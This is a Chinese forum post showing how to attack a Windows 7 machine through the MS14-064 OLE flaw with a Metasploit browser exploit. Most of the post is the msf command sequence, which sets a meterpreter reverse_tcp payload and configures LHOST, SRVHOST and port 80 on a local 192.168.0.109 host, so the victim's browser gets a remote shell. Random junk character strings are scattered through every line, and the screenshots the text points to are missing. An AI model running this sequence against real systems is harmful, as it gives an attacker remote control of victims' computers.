找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1584|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) a/ R: V% V: |; H9 b 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 & `6 Q: q! Q# y7 Y& t

! x) t( f/ B. n8 g

6 l, J( @6 x" ]& x3 L. c: a 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: % z! t' j- ^. B& E' {

2 y/ e' g, O! |1 N

, `5 g x9 i# u 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp7 O4 ~7 ?9 C' h" R$ n

* ^. A+ u1 n0 @8 [

. J1 m# `8 c0 p3 Q! U: m5 D             set AllowPowershellPrompt true 2 @5 D$ Y& |+ B. _: d& J) [

$ D/ k* j) x# l- ?+ ?/ T8 V

9 e I+ h0 r5 _$ f* ^             Set LHOST 192.168.0.109( [5 U/ Q2 j- [8 p

" z8 k: }. z6 g4 d) i

+ s2 b' y" m# q8 m# [ r/ q1 }. |" X             set SRVHOST 192.168.0.109 ) q" B J& g! a" N

5 X4 ~& X+ x* m; i5 C/ F

8 o& N9 x6 g4 {1 c; C# o             Set uripath share 0 K3 P. ?( z( r) W o& ]

% o- Y3 B5 P) m: H

; t( c! P% b: Y2 s             Set srvport 80. N- r5 O; r5 T% A' j* p$ m5 ~

- j, Y: |) E9 ^

) z3 \) P* C" } F- }9 P6 q   4 `! j6 ^! o$ X$ v& z% R

( v! }: P2 q8 ^$ u9 c! {

8 V5 E8 x8 z4 `2 G   6 r/ \8 j# ?2 G

6 e* D: a& L. R7 Z' o1 p7 T

* S3 G7 K( G7 j0 s! G  , S: k' O' C" z. q& p9 w- [5 Z

5 }) ?% s0 y# W

7 D) x; a% H0 K: s   % R5 B) [) b: r5 n0 a+ x

& }7 h+ F* h9 C! y

: Y! L- j! e) Z% _   / |. x: ^# P0 V

+ d9 E* |( D0 S( r) J. j

1 u: j6 M9 g- \% d 下面我们来访问本地地址如图: 6 A/ z% z1 |! L+ \

5 }+ h# R, |% s4 x8 y

$ ~) H0 D+ y/ L9 w   m) L3 `' H+ S" k7 q0 d# S# D

, Y z# `! _; J- `( N

* l8 U3 p- X! q8 v9 P( B  , K. r8 S, J: v

8 G0 e y# u# T$ T/ ]! _* V

* ]( u; k v+ q) t) v % L) B) Y& I; `3 n1 n

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表